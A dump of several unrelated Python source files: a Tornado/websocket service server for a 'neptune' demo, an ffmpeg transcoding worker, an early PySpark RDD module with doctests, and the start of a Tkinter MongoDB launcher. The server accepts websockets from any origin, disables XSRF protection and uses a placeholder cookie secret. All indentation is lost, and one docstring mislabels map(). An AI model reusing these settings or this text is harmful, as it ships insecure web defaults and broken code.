class WebSocketHandler(tornado.websocket.WebSocketHandler):
clientConnections = []
def __init__(self, *args, **kwargs):
super(WebSocketHandler, self).__init__(*args, **kwargs)
print("[WS] websocket ready")
def open(self):
self.id = str(uuid.uuid4())
self.last_send = None
print("[WS] websocket opened %s" % self.id)
self.send('id', self.id)
WebSocketHandler.clientConnections.append(self)
def on_message(self, messageStr):
try:
print('[WS] message received from %s: %s' % (self.id, messageStr))
message = json.loads(messageStr)
if message['topic'] == 'update_id':
origId = message['id']
self.id = origId # take over original id
except:
pass
def on_close(self):
print("[WS] websocket closed %s" % self.id)
WebSocketHandler.clientConnections.remove(self)
def send(self, topic, msg):
if not msg:
return
now = time.time()
if self.last_send and (now - self.last_send) < 0.05:
# don't flood the client with too many messages; drop
return
self.last_send = now
try:
msg_POD = {}
msg_POD['time'] = datetime.now().isoformat()
msg_POD['topic'] = topic
msg_POD['message'] = msg
self.write_message(json.dumps(msg_POD))
except Exception as e:
print(e)
@staticmethod
def send_to_client(id, topic, msg):
try:
for c in WebSocketHandler.clientConnections:
if c.id == id:
c.send(topic, msg)
except:
pass
@staticmethod
def broadcast(topic, msg):
try:
for c in WebSocketHandler.clientConnections:
c.send(topic, msg)
except:
pass
def check_origin(self, origin):
return True
class ServerWebApplication(tornado.web.Application):
def __init__(self):
self.request_id_gen = RequestIdGenerator()
handlers = self.init_handlers()
super(ServerWebApplication, self).__init__(
handlers,
cookie_secret="COOKIE_SECRET",
template_path=os.path.join(os.path.dirname(__file__), "templates"),
static_path=os.path.join(os.path.dirname(__file__), "static"),
xsrf_cookies=False, #? should be true?
autoreload=False,
debug=options.debug
)
def init_handlers(self):
"""
Define the basic REST handlers. These cannot be destroyed.
Returns:
List: List of handler tuples for initializing a Tornado web app
"""
handlers = []
handlers.append((r"/", IndexHandler))
handlers.append((r"/services/list", ListServiceHandler))
handlers.append((r"/services/query", QueryServiceHandler))
handlers.append((r"/services/start", StartServiceHandler))
handlers.append((r"/services/stop", StopServiceHandler))
handlers.append((r"/services/construct", ConstructServiceHandler))
handlers.append((r"/services/destruct", DestructServiceHandler))
handlers.append((r"/render/([^/]+)", RenderHandler))
return handlers
class ServerApp(object):
def __init__(self):
signal.signal(signal.SIGINT, self.signal_handler)
# signal.signal(signal.SIGQUIT, self.sigquit_handler)
self.do_exit = False
self.hbeat_id = 0
self.hbeat = 0
# self.do_restart = False
self.xserver = xstream.Server()
parse_command_line()
self.web_app = ServerWebApplication()
# Add handlers for default services here so they can be destroyed if
# needed. Handlers installed in the web_app __init__ cannot be destroyed.
recipes = self.get_recipes()
for recipe in recipes:
tornado_handler = construct.construct(recipe)
self.web_app.add_handlers(
r".*", # match any host
tornado_handler
)
self.web_server = self.web_app.listen(options.port)
self.ws_app = tornado.web.Application([(r"/", WebSocketHandler)])
self.ws_server = self.ws_app.listen(options.wsport)
self.xspub = xstream.Publisher()
self.xs2server = threading.Thread(target=ServerApp.xstream2server)
self.xs2server.start()
self.heartbeat_thread = threading.Thread(target=ServerApp.heartbeat, args=(lambda: self.do_exit,))
self.heartbeat_thread.start()
@staticmethod
def get_recipes():
"""
Get all recipes from the recipes folder. If recipe_*.bak files exist,
use those to construct services. Otherwise, construct from source using
the default recipe functions.
"""
recipes = []
recipes_cache = os.environ["VAI_ALVEO_ROOT"] + "/../demo/neptune/recipes/"
file_names = [fn for fn in os.listdir(recipes_cache)
if fn.startswith('recipe_') and fn.endswith('.bak')]
if file_names:
logger.info("Constructing services from cache")
for file_name in file_names:
with open(recipes_cache + file_name) as f:
recipes.append(json.load(f, object_hook=hinted_tuple_hook))
else:
logger.info("Constructing services from source")
modules = list_submodules('neptune.recipes')
for module_path in modules:
module = importlib.import_module(module_path)
attrs = dir(module)
for attr in attrs:
if attr.startswith('recipe_'):
recipe = getattr(module, attr)
if callable(recipe):
recipes.append(recipe().to_dict())
return recipes
@staticmethod
def xstream2server():
xs = xstream.Subscribe("__server__")
while True:
# subscribe to special "__server__" channel for
# other processes to send messages to this server
# e.g. speedodata -> websockets
msg_str = xs.get_msg()
if msg_str is None:
break
try:
msg = json.loads(msg_str)
if msg['topic'] == 'speedodata':
WebSocketHandler.broadcast(msg['topic'], msg['message'])
elif msg['topic'] == 'callback' and 'callback_id' in msg:
# print("sending callback message")
# print(msg['message'])
WebSocketHandler.send_to_client(\
msg['callback_id'], msg['topic'], msg['message'])
elif msg['topic'] == 'xs_throughput':
report = json.loads(msg['message'])
#print(report)
for name, throughput in report.items():
serviceName = name.split('.')[0]
edgeName = name[name.find('.')+1:]
ServiceManager().update_throughput_stats(serviceName,
edgeName, throughput)
except:
pass
cancel_async_tasks()
@staticmethod
def heartbeat(stop):
xs = xstream.Subscribe("__heartbeat__", timeout=5000)
service_manager = ServiceManager()
node_status = {}
def check_services(node_status):
if stop:
return
invalid_services = []
for service, status in node_status.items():
last_valid = status['last_valid']
service_state = service_manager._services[service]['state']
is_starting = service_state == service_manager.STARTING
is_started = service_state == service_manager.STARTED
# if the service has been stopped, clear it
if service_state == service_manager.STOPPED:
invalid_services.append(service)
# if there's a discrepancy in what the service_manager says
# and what we have cached, clear it
elif is_starting and node_status[service]['is_started']:
invalid_services.append(service)
# if it's started and hasn't been valid in the last n secs,
# restart it
elif is_started and now - last_valid > 5:
logger.warning("Service %s is dead, restarting" % service)
service_manager.stop(service)
service_manager.start(service)
node_status[service]['is_started'] = False
for service in invalid_services:
del node_status[service]
logger = logging.getLogger(__name__)
while True:
if stop():
break
# when enabling coverage, this line will raise an exception for some
# reason. For now, just catching it
try:
msg_str = xs.get_msg()
now = time.time()
except Exception:
logger.exception("Shouldn't happen")
# the get_msg timed out, i.e. no heartbeats received
if msg_str == (None, None):
check_services(node_status)
continue
msg = json.loads(msg_str)
service = msg['service']
channel = msg['channel']
# if this is the first time we've seen this service
if service not in node_status:
_first_edge, last_edge = service_manager._get_graph_io(service)
node_status[service] = {
'last_valid': 0, # saves the last time this service was valid
'is_started': False, # our check that services haven't stopped
'last_edge': last_edge[0], # saves the last edge of the service
'channels': {} # save heartbeat times for each channel
}
node_status[service]['channels'][channel] = now
service_state = service_manager._services[service]['state']
if node_status[service]['last_edge'] == channel:
if service_state == service_manager.STARTING:
if not node_status[service]['is_started']:
service_manager._services[service]['state'] = service_manager.STARTED
node_status[service]['is_started'] = True
else:
# there's a discrepancy. For example, the service may
# have been stopped and something else started with
# the same name. In this case, clear the cache
del node_status[service]
continue
node_status[service]['last_valid'] = now
check_services(node_status)
cancel_async_tasks()
def launch(self):
tornado.ioloop.PeriodicCallback(self.check_exit, 500).start()
loop = tornado.ioloop.IOLoop.instance()
loop.start()
loop.close()
def signal_handler(self, signum, frame):
logger.status("Shutting down server...")
ServiceManager().stop_all()
self.do_exit = True
# def sigquit_handler(self, signum, frame):
# print("restarting server...")
# ServiceManager().stop_all()
# self.do_restart = True
def check_exit(self):
if self.do_exit:
self.xspub.end("__server__")
self.xs2server.join()
self.heartbeat_thread.join()
self.ws_server.stop()
self.web_server.stop()
cancel_async_tasks()
del self.xserver
elif self.hbeat > 4:
self.hbeat = 0
service_manager = ServiceManager()
services_list = service_manager.list()
started_services = []
for name, svc in services_list.items():
if svc['state'] >= service_manager.STARTING:
started_services.append(name)
for service in started_services:
msg = json.dumps({
'__heartbeat__': service,
'id': 'hbeat_' + str(self.hbeat_id)
})
service_manager.send(service, 0, np.zeros(1), msg)
self.hbeat_id = (self.hbeat_id + 1) % 9999
else:
self.hbeat += 1
# the restarted server is unresponsive. We don't need this functionality
# right now but if needed, it needs to be debugged.
# if self.do_restart:
# self.xspub.end("__server__")
# self.xs2server.join()
# self.ws_server.stop()
# self.web_server.stop()
# del self.xserver
# tornado.ioloop.IOLoop.instance().stop()
# self.do_restart = False
# ServiceManager()._drop()
# NodeManager()._drop()
# xstream.Statistics()._drop()
# main()
def main():
logging_directory = os.environ['VAI_ALVEO_ROOT'] + '/../demo/neptune/logs/'
log_name = '_{:%Y-%m-%d}.log'.format(datetime.now())
with open(logging_directory + 'neptune' + log_name, 'a') as f:
f.write("################################################################\n")
# https://github.com/tornadoweb/tornado/issues/2531
if six.PY3:
asyncio.set_event_loop_policy(AnyThreadEventLoopPolicy())
app = ServerApp()
app.launch()
if __name__ == "__main__":
main()
|
selfNode.py | import logging
import socket
import subprocess
import threading
import time
from python.cloudServer import Processor
def memoryToffmpeg(In, Out):
try:
Out.write(In)
Out.flush()
Out.close()
except Exception as e:
logging.exception(e)
class SelfNode:
def __init__(self):
self.processor = Processor()
def attachToServer(self, server):
server.registerProcessor(self.processor)
def start(self):
t = threading.Thread(target=self.selfNode)
t.start()
def selfNode(self):
while True:
p = None
try:
if not self.processor.isCanStartWork():
time.sleep(0.1)
continue
p = subprocess.Popen(['ffmpeg', '-f', 'mpegts', '-i', '-',
'-c:v', 'libx264', '-c:a', 'aac', '-preset', 'veryfast', '-f', 'mpegts', '-'],
stdin=subprocess.PIPE, stdout=subprocess.PIPE, stderr=subprocess.DEVNULL)
copy = threading.Thread(target=memoryToffmpeg, args=(self.processor.workData, p.stdin,))
copy.start()
converted = p.stdout.read()
p.stdout.close()
p.wait()
self.processor.markAsFinished(converted)
except Exception as e:
logging.exception(e)
try:
p.kill()
except:
pass
|
rdd.py | from base64 import standard_b64encode as b64enc
import copy
from collections import defaultdict
from itertools import chain, ifilter, imap, product
import operator
import os
import shlex
from subprocess import Popen, PIPE
from tempfile import NamedTemporaryFile
from threading import Thread
from pyspark import cloudpickle
from pyspark.serializers import batched, Batch, dump_pickle, load_pickle, \
read_from_pickle_file
from pyspark.join import python_join, python_left_outer_join, \
python_right_outer_join, python_cogroup
from py4j.java_collections import ListConverter, MapConverter
__all__ = ["RDD"]
class RDD(object):
"""
A Resilient Distributed Dataset (RDD), the basic abstraction in Spark.
Represents an immutable, partitioned collection of elements that can be
operated on in parallel.
"""
def __init__(self, jrdd, ctx):
self._jrdd = jrdd
self.is_cached = False
self.is_checkpointed = False
self.ctx = ctx
self._partitionFunc = None
@property
def context(self):
"""
The L{SparkContext} that this RDD was created on.
"""
return self.ctx
def cache(self):
"""
Persist this RDD with the default storage level (C{MEMORY_ONLY}).
"""
self.is_cached = True
self._jrdd.cache()
return self
def checkpoint(self):
"""
Mark this RDD for checkpointing. It will be saved to a file inside the
checkpoint directory set with L{SparkContext.setCheckpointDir()} and
all references to its parent RDDs will be removed. This function must
be called before any job has been executed on this RDD. It is strongly
recommended that this RDD is persisted in memory, otherwise saving it
on a file will require recomputation.
"""
self.is_checkpointed = True
self._jrdd.rdd().checkpoint()
def isCheckpointed(self):
"""
Return whether this RDD has been checkpointed or not
"""
return self._jrdd.rdd().isCheckpointed()
def getCheckpointFile(self):
"""
Gets the name of the file to which this RDD was checkpointed
"""
checkpointFile = self._jrdd.rdd().getCheckpointFile()
if checkpointFile.isDefined():
return checkpointFile.get()
else:
return None
# TODO persist(self, storageLevel)
def map(self, f, preservesPartitioning=False):
"""
Return a new RDD containing the distinct elements in this RDD.
"""
def func(split, iterator): return imap(f, iterator)
return PipelinedRDD(self, func, preservesPartitioning)
def flatMap(self, f, preservesPartitioning=False):
"""
Return a new RDD by first applying a function to all elements of this
RDD, and then flattening the results.
>>> rdd = sc.parallelize([2, 3, 4])
>>> sorted(rdd.flatMap(lambda x: range(1, x)).collect())
[1, 1, 1, 2, 2, 3]
>>> sorted(rdd.flatMap(lambda x: [(x, x), (x, x)]).collect())
[(2, 2), (2, 2), (3, 3), (3, 3), (4, 4), (4, 4)]
"""
def func(s, iterator): return chain.from_iterable(imap(f, iterator))
return self.mapPartitionsWithSplit(func, preservesPartitioning)
def mapPartitions(self, f, preservesPartitioning=False):
"""
Return a new RDD by applying a function to each partition of this RDD.
>>> rdd = sc.parallelize([1, 2, 3, 4], 2)
>>> def f(iterator): yield sum(iterator)
>>> rdd.mapPartitions(f).collect()
[3, 7]
"""
def func(s, iterator): return f(iterator)
return self.mapPartitionsWithSplit(func)
def mapPartitionsWithSplit(self, f, preservesPartitioning=False):
"""
Return a new RDD by applying a function to each partition of this RDD,
while tracking the index of the original partition.
>>> rdd = sc.parallelize([1, 2, 3, 4], 4)
>>> def f(splitIndex, iterator): yield splitIndex
>>> rdd.mapPartitionsWithSplit(f).sum()
6
"""
return PipelinedRDD(self, f, preservesPartitioning)
def filter(self, f):
"""
Return a new RDD containing only the elements that satisfy a predicate.
>>> rdd = sc.parallelize([1, 2, 3, 4, 5])
>>> rdd.filter(lambda x: x % 2 == 0).collect()
[2, 4]
"""
def func(iterator): return ifilter(f, iterator)
return self.mapPartitions(func)
def distinct(self):
"""
Return a new RDD containing the distinct elements in this RDD.
>>> sorted(sc.parallelize([1, 1, 2, 3]).distinct().collect())
[1, 2, 3]
"""
return self.map(lambda x: (x, "")) \
.reduceByKey(lambda x, _: x) \
.map(lambda (x, _): x)
# TODO: sampling needs to be re-implemented due to Batch
#def sample(self, withReplacement, fraction, seed):
# jrdd = self._jrdd.sample(withReplacement, fraction, seed)
# return RDD(jrdd, self.ctx)
#def takeSample(self, withReplacement, num, seed):
# vals = self._jrdd.takeSample(withReplacement, num, seed)
# return [load_pickle(bytes(x)) for x in vals]
def union(self, other):
"""
Return the union of this RDD and another one.
>>> rdd = sc.parallelize([1, 1, 2, 3])
>>> rdd.union(rdd).collect()
[1, 1, 2, 3, 1, 1, 2, 3]
"""
return RDD(self._jrdd.union(other._jrdd), self.ctx)
def __add__(self, other):
"""
Return the union of this RDD and another one.
>>> rdd = sc.parallelize([1, 1, 2, 3])
>>> (rdd + rdd).collect()
[1, 1, 2, 3, 1, 1, 2, 3]
"""
if not isinstance(other, RDD):
raise TypeError
return self.union(other)
# TODO: sort
def glom(self):
"""
Return an RDD created by coalescing all elements within each partition
into a list.
>>> rdd = sc.parallelize([1, 2, 3, 4], 2)
>>> sorted(rdd.glom().collect())
[[1, 2], [3, 4]]
"""
def func(iterator): yield list(iterator)
return self.mapPartitions(func)
def cartesian(self, other):
"""
Return the Cartesian product of this RDD and another one, that is, the
RDD of all pairs of elements C{(a, b)} where C{a} is in C{self} and
C{b} is in C{other}.
>>> rdd = sc.parallelize([1, 2])
>>> sorted(rdd.cartesian(rdd).collect())
[(1, 1), (1, 2), (2, 1), (2, 2)]
"""
# Due to batching, we can't use the Java cartesian method.
java_cartesian = RDD(self._jrdd.cartesian(other._jrdd), self.ctx)
def unpack_batches(pair):
(x, y) = pair
if type(x) == Batch or type(y) == Batch:
xs = x.items if type(x) == Batch else [x]
ys = y.items if type(y) == Batch else [y]
for pair in product(xs, ys):
yield pair
else:
yield pair
return java_cartesian.flatMap(unpack_batches)
def groupBy(self, f, numSplits=None):
"""
Return an RDD of grouped items.
>>> rdd = sc.parallelize([1, 1, 2, 3, 5, 8])
>>> result = rdd.groupBy(lambda x: x % 2).collect()
>>> sorted([(x, sorted(y)) for (x, y) in result])
[(0, [2, 8]), (1, [1, 1, 3, 5])]
"""
return self.map(lambda x: (f(x), x)).groupByKey(numSplits)
def pipe(self, command, env={}):
"""
Return an RDD created by piping elements to a forked external process.
>>> sc.parallelize([1, 2, 3]).pipe('cat').collect()
['1', '2', '3']
"""
def func(iterator):
pipe = Popen(shlex.split(command), env=env, stdin=PIPE, stdout=PIPE)
def pipe_objs(out):
for obj in iterator:
out.write(str(obj).rstrip('\n') + '\n')
out.close()
Thread(target=pipe_objs, args=[pipe.stdin]).start()
return (x.rstrip('\n') for x in pipe.stdout)
return self.mapPartitions(func)
def foreach(self, f):
"""
Applies a function to all elements of this RDD.
>>> def f(x): print x
>>> sc.parallelize([1, 2, 3, 4, 5]).foreach(f)
"""
self.map(f).collect() # Force evaluation
def collect(self):
"""
Return a list that contains all of the elements in this RDD.
"""
picklesInJava = self._jrdd.collect().iterator()
return list(self._collect_iterator_through_file(picklesInJava))
def _collect_iterator_through_file(self, iterator):
# Transferring lots of data through Py4J can be slow because
# socket.readline() is inefficient. Instead, we'll dump the data to a
# file and read it back.
tempFile = NamedTemporaryFile(delete=False, dir=self.ctx._temp_dir)
tempFile.close()
self.ctx._writeIteratorToPickleFile(iterator, tempFile.name)
# Read the data into Python and deserialize it:
with open(tempFile.name, 'rb') as tempFile:
for item in read_from_pickle_file(tempFile):
yield item
os.unlink(tempFile.name)
def reduce(self, f):
"""
Reduces the elements of this RDD using the specified commutative and
associative binary operator.
>>> from operator import add
>>> sc.parallelize([1, 2, 3, 4, 5]).reduce(add)
15
>>> sc.parallelize((2 for _ in range(10))).map(lambda x: 1).cache().reduce(add)
10
"""
def func(iterator):
acc = None
for obj in iterator:
if acc is None:
acc = obj
else:
acc = f(obj, acc)
if acc is not None:
yield acc
vals = self.mapPartitions(func).collect()
return reduce(f, vals)
def fold(self, zeroValue, op):
"""
Aggregate the elements of each partition, and then the results for all
the partitions, using a given associative function and a neutral "zero
value."
The function C{op(t1, t2)} is allowed to modify C{t1} and return it
as its result value to avoid object allocation; however, it should not
modify C{t2}.
>>> from operator import add
>>> sc.parallelize([1, 2, 3, 4, 5]).fold(0, add)
15
"""
def func(iterator):
acc = zeroValue
for obj in iterator:
acc = op(obj, acc)
yield acc
vals = self.mapPartitions(func).collect()
return reduce(op, vals, zeroValue)
# TODO: aggregate
def sum(self):
"""
Add up the elements in this RDD.
>>> sc.parallelize([1.0, 2.0, 3.0]).sum()
6.0
"""
return self.mapPartitions(lambda x: [sum(x)]).reduce(operator.add)
def count(self):
"""
Return the number of elements in this RDD.
>>> sc.parallelize([2, 3, 4]).count()
3
"""
return self.mapPartitions(lambda i: [sum(1 for _ in i)]).sum()
def countByValue(self):
"""
Return the count of each unique value in this RDD as a dictionary of
(value, count) pairs.
>>> sorted(sc.parallelize([1, 2, 1, 2, 2], 2).countByValue().items())
[(1, 2), (2, 3)]
"""
def countPartition(iterator):
counts = defaultdict(int)
for obj in iterator:
counts[obj] += 1
yield counts
def mergeMaps(m1, m2):
for (k, v) in m2.iteritems():
m1[k] += v
return m1
return self.mapPartitions(countPartition).reduce(mergeMaps)
def take(self, num):
"""
Take the first num elements of the RDD.
This currently scans the partitions *one by one*, so it will be slow if
a lot of partitions are required. In that case, use L{collect} to get
the whole RDD instead.
>>> sc.parallelize([2, 3, 4, 5, 6]).cache().take(2)
[2, 3]
>>> sc.parallelize([2, 3, 4, 5, 6]).take(10)
[2, 3, 4, 5, 6]
"""
items = []
for partition in range(self._jrdd.splits().size()):
iterator = self.ctx._takePartition(self._jrdd.rdd(), partition)
# Each item in the iterator is a string, Python object, batch of
# Python objects. Regardless, it is sufficient to take `num`
# of these objects in order to collect `num` Python objects:
iterator = iterator.take(num)
items.extend(self._collect_iterator_through_file(iterator))
if len(items) >= num:
break
return items[:num]
def first(self):
"""
Return the first element in this RDD.
>>> sc.parallelize([2, 3, 4]).first()
2
"""
return self.take(1)[0]
def saveAsTextFile(self, path):
"""
Save this RDD as a text file, using string representations of elements.
>>> tempFile = NamedTemporaryFile(delete=True)
>>> tempFile.close()
>>> sc.parallelize(range(10)).saveAsTextFile(tempFile.name)
>>> from fileinput import input
>>> from glob import glob
>>> ''.join(input(glob(tempFile.name + "/part-0000*")))
'0\\n1\\n2\\n3\\n4\\n5\\n6\\n7\\n8\\n9\\n'
"""
def func(split, iterator):
return (str(x).encode("utf-8") for x in iterator)
keyed = PipelinedRDD(self, func)
keyed._bypass_serializer = True
keyed._jrdd.map(self.ctx._jvm.BytesToString()).saveAsTextFile(path)
# Pair functions
def collectAsMap(self):
"""
Return the key-value pairs in this RDD to the master as a dictionary.
>>> m = sc.parallelize([(1, 2), (3, 4)]).collectAsMap()
>>> m[1]
2
>>> m[3]
4
"""
return dict(self.collect())
def reduceByKey(self, func, numSplits=None):
"""
Merge the values for each key using an associative reduce function.
This will also perform the merging locally on each mapper before
sending results to a reducer, similarly to a "combiner" in MapReduce.
Output will be hash-partitioned with C{numSplits} splits, or the
default parallelism level if C{numSplits} is not specified.
>>> from operator import add
>>> rdd = sc.parallelize([("a", 1), ("b", 1), ("a", 1)])
>>> sorted(rdd.reduceByKey(add).collect())
[('a', 2), ('b', 1)]
"""
return self.combineByKey(lambda x: x, func, func, numSplits)
def reduceByKeyLocally(self, func):
"""
Merge the values for each key using an associative reduce function, but
return the results immediately to the master as a dictionary.
This will also perform the merging locally on each mapper before
sending results to a reducer, similarly to a "combiner" in MapReduce.
>>> from operator import add
>>> rdd = sc.parallelize([("a", 1), ("b", 1), ("a", 1)])
>>> sorted(rdd.reduceByKeyLocally(add).items())
[('a', 2), ('b', 1)]
"""
def reducePartition(iterator):
m = {}
for (k, v) in iterator:
m[k] = v if k not in m else func(m[k], v)
yield m
def mergeMaps(m1, m2):
for (k, v) in m2.iteritems():
m1[k] = v if k not in m1 else func(m1[k], v)
return m1
return self.mapPartitions(reducePartition).reduce(mergeMaps)
def countByKey(self):
"""
Count the number of elements for each key, and return the result to the
master as a dictionary.
>>> rdd = sc.parallelize([("a", 1), ("b", 1), ("a", 1)])
>>> sorted(rdd.countByKey().items())
[('a', 2), ('b', 1)]
"""
return self.map(lambda x: x[0]).countByValue()
def join(self, other, numSplits=None):
"""
Return an RDD containing all pairs of elements with matching keys in
C{self} and C{other}.
Each pair of elements will be returned as a (k, (v1, v2)) tuple, where
(k, v1) is in C{self} and (k, v2) is in C{other}.
Performs a hash join across the cluster.
>>> x = sc.parallelize([("a", 1), ("b", 4)])
>>> y = sc.parallelize([("a", 2), ("a", 3)])
>>> sorted(x.join(y).collect())
[('a', (1, 2)), ('a', (1, 3))]
"""
return python_join(self, other, numSplits)
def leftOuterJoin(self, other, numSplits=None):
"""
Perform a left outer join of C{self} and C{other}.
For each element (k, v) in C{self}, the resulting RDD will either
contain all pairs (k, (v, w)) for w in C{other}, or the pair
(k, (v, None)) if no elements in other have key k.
Hash-partitions the resulting RDD into the given number of partitions.
>>> x = sc.parallelize([("a", 1), ("b", 4)])
>>> y = sc.parallelize([("a", 2)])
>>> sorted(x.leftOuterJoin(y).collect())
[('a', (1, 2)), ('b', (4, None))]
"""
return python_left_outer_join(self, other, numSplits)
def rightOuterJoin(self, other, numSplits=None):
"""
Perform a right outer join of C{self} and C{other}.
For each element (k, w) in C{other}, the resulting RDD will either
contain all pairs (k, (v, w)) for v in this, or the pair (k, (None, w))
if no elements in C{self} have key k.
Hash-partitions the resulting RDD into the given number of partitions.
>>> x = sc.parallelize([("a", 1), ("b", 4)])
>>> y = sc.parallelize([("a", 2)])
>>> sorted(y.rightOuterJoin(x).collect())
[('a', (2, 1)), ('b', (None, 4))]
"""
return python_right_outer_join(self, other, numSplits)
# TODO: add option to control map-side combining
def partitionBy(self, numSplits, partitionFunc=hash):
"""
Return a copy of the RDD partitioned using the specified partitioner.
>>> pairs = sc.parallelize([1, 2, 3, 4, 2, 4, 1]).map(lambda x: (x, x))
>>> sets = pairs.partitionBy(2).glom().collect()
>>> set(sets[0]).intersection(set(sets[1]))
set([])
"""
if numSplits is None:
numSplits = self.ctx.defaultParallelism
# Transferring O(n) objects to Java is too expensive. Instead, we'll
# form the hash buckets in Python, transferring O(numSplits) objects
# to Java. Each object is a (splitNumber, [objects]) pair.
def add_shuffle_key(split, iterator):
buckets = defaultdict(list)
for (k, v) in iterator:
buckets[partitionFunc(k) % numSplits].append((k, v))
for (split, items) in buckets.iteritems():
yield str(split)
yield dump_pickle(Batch(items))
keyed = PipelinedRDD(self, add_shuffle_key)
keyed._bypass_serializer = True
pairRDD = self.ctx._jvm.PairwiseRDD(keyed._jrdd.rdd()).asJavaPairRDD()
partitioner = self.ctx._jvm.PythonPartitioner(numSplits,
id(partitionFunc))
jrdd = pairRDD.partitionBy(partitioner).values()
rdd = RDD(jrdd, self.ctx)
# This is required so that id(partitionFunc) remains unique, even if
# partitionFunc is a lambda:
rdd._partitionFunc = partitionFunc
return rdd
# TODO: add control over map-side aggregation
def combineByKey(self, createCombiner, mergeValue, mergeCombiners,
numSplits=None):
"""
Generic function to combine the elements for each key using a custom
set of aggregation functions.
Turns an RDD[(K, V)] into a result of type RDD[(K, C)], for a "combined
type" C. Note that V and C can be different -- for example, one might
group an RDD of type (Int, Int) into an RDD of type (Int, List[Int]).
Users provide three functions:
- C{createCombiner}, which turns a V into a C (e.g., creates
a one-element list)
- C{mergeValue}, to merge a V into a C (e.g., adds it to the end of
a list)
- C{mergeCombiners}, to combine two C's into a single one.
In addition, users can control the partitioning of the output RDD.
>>> x = sc.parallelize([("a", 1), ("b", 1), ("a", 1)])
>>> def f(x): return x
>>> def add(a, b): return a + str(b)
>>> sorted(x.combineByKey(str, add, add).collect())
[('a', '11'), ('b', '1')]
"""
if numSplits is None:
numSplits = self.ctx.defaultParallelism
def combineLocally(iterator):
combiners = {}
for (k, v) in iterator:
if k not in combiners:
combiners[k] = createCombiner(v)
else:
combiners[k] = mergeValue(combiners[k], v)
return combiners.iteritems()
locally_combined = self.mapPartitions(combineLocally)
shuffled = locally_combined.partitionBy(numSplits)
def _mergeCombiners(iterator):
combiners = {}
for (k, v) in iterator:
if not k in combiners:
combiners[k] = v
else:
combiners[k] = mergeCombiners(combiners[k], v)
return combiners.iteritems()
return shuffled.mapPartitions(_mergeCombiners)
# TODO: support variant with custom partitioner
def groupByKey(self, numSplits=None):
"""
Group the values for each key in the RDD into a single sequence.
Hash-partitions the resulting RDD with into numSplits partitions.
>>> x = sc.parallelize([("a", 1), ("b", 1), ("a", 1)])
>>> sorted(x.groupByKey().collect())
[('a', [1, 1]), ('b', [1])]
"""
def createCombiner(x):
return [x]
def mergeValue(xs, x):
xs.append(x)
return xs
def mergeCombiners(a, b):
return a + b
return self.combineByKey(createCombiner, mergeValue, mergeCombiners,
numSplits)
# TODO: add tests
def flatMapValues(self, f):
"""
Pass each value in the key-value pair RDD through a flatMap function
without changing the keys; this also retains the original RDD's
partitioning.
"""
flat_map_fn = lambda (k, v): ((k, x) for x in f(v))
return self.flatMap(flat_map_fn, preservesPartitioning=True)
def mapValues(self, f):
"""
Pass each value in the key-value pair RDD through a map function
without changing the keys; this also retains the original RDD's
partitioning.
"""
map_values_fn = lambda (k, v): (k, f(v))
return self.map(map_values_fn, preservesPartitioning=True)
# TODO: support varargs cogroup of several RDDs.
def groupWith(self, other):
"""
Alias for cogroup.
"""
return self.cogroup(other)
# TODO: add variant with custom parittioner
def cogroup(self, other, numSplits=None):
"""
For each key k in C{self} or C{other}, return a resulting RDD that
contains a tuple with the list of values for that key in C{self} as well
as C{other}.
>>> x = sc.parallelize([("a", 1), ("b", 4)])
>>> y = sc.parallelize([("a", 2)])
>>> sorted(x.cogroup(y).collect())
[('a', ([1], [2])), ('b', ([4], []))]
"""
return python_cogroup(self, other, numSplits)
# TODO: `lookup` is disabled because we can't make direct comparisons based
# on the key; we need to compare the hash of the key to the hash of the
# keys in the pairs. This could be an expensive operation, since those
# hashes aren't retained.
class PipelinedRDD(RDD):
"""
Pipelined maps:
>>> rdd = sc.parallelize([1, 2, 3, 4])
>>> rdd.map(lambda x: 2 * x).cache().map(lambda x: 2 * x).collect()
[4, 8, 12, 16]
>>> rdd.map(lambda x: 2 * x).map(lambda x: 2 * x).collect()
[4, 8, 12, 16]
Pipelined reduces:
>>> from operator import add
>>> rdd.map(lambda x: 2 * x).reduce(add)
20
>>> rdd.flatMap(lambda x: [x, x]).reduce(add)
20
"""
def __init__(self, prev, func, preservesPartitioning=False):
if isinstance(prev, PipelinedRDD) and prev._is_pipelinable():
prev_func = prev.func
def pipeline_func(split, iterator):
return func(split, prev_func(split, iterator))
self.func = pipeline_func
self.preservesPartitioning = \
prev.preservesPartitioning and preservesPartitioning
self._prev_jrdd = prev._prev_jrdd
else:
self.func = func
self.preservesPartitioning = preservesPartitioning
self._prev_jrdd = prev._jrdd
self.is_cached = False
self.is_checkpointed = False
self.ctx = prev.ctx
self.prev = prev
self._jrdd_val = None
self._bypass_serializer = False
@property
def _jrdd(self):
if self._jrdd_val:
return self._jrdd_val
func = self.func
if not self._bypass_serializer and self.ctx.batchSize != 1:
oldfunc = self.func
batchSize = self.ctx.batchSize
def batched_func(split, iterator):
return batched(oldfunc(split, iterator), batchSize)
func = batched_func
cmds = [func, self._bypass_serializer]
pipe_command = ' '.join(b64enc(cloudpickle.dumps(f)) for f in cmds)
broadcast_vars = ListConverter().convert(
[x._jbroadcast for x in self.ctx._pickled_broadcast_vars],
self.ctx._gateway._gateway_client)
self.ctx._pickled_broadcast_vars.clear()
class_manifest = self._prev_jrdd.classManifest()
env = copy.copy(self.ctx.environment)
env['PYTHONPATH'] = os.environ.get("PYTHONPATH", "")
env = MapConverter().convert(env, self.ctx._gateway._gateway_client)
python_rdd = self.ctx._jvm.PythonRDD(self._prev_jrdd.rdd(),
pipe_command, env, self.preservesPartitioning, self.ctx.pythonExec,
broadcast_vars, self.ctx._javaAccumulator, class_manifest)
self._jrdd_val = python_rdd.asJavaRDD()
return self._jrdd_val
def _is_pipelinable(self):
return not (self.is_cached or self.is_checkpointed)
def _test():
import doctest
from pyspark.context import SparkContext
globs = globals().copy()
# The small batch size here ensures that we see multiple batches,
# even in these small test examples:
globs['sc'] = SparkContext('local[4]', 'PythonTest', batchSize=2)
(failure_count, test_count) = doctest.testmod(globs=globs)
globs['sc'].stop()
if failure_count:
exit(-1)
if __name__ == "__main__":
_test()
|
MongoApp.py | #!/usr/bin/env python
# -*- coding: utf-8 -*-
import subprocess
import threading
import tkFont
import ttk
import webbrowser
from os import makedirs
from os.path import exists, expanduser, join as path_join
from sys import path as sys_path
from Tkinter import *
sys_path.append('libs')
from PIL import ImageTk, Image
HomeFolder = expanduser("~")
DATA_ROOT_FOLDER = path_join(HomeFolder, "MongoAppData")
class MongoApp():
pidPath = path_join(DATA_ROOT_FOLDER, 'logs', 'mongo.pid')
dbPath = path_join(DATA_ROOT_FOLDER, 'data', 'db')
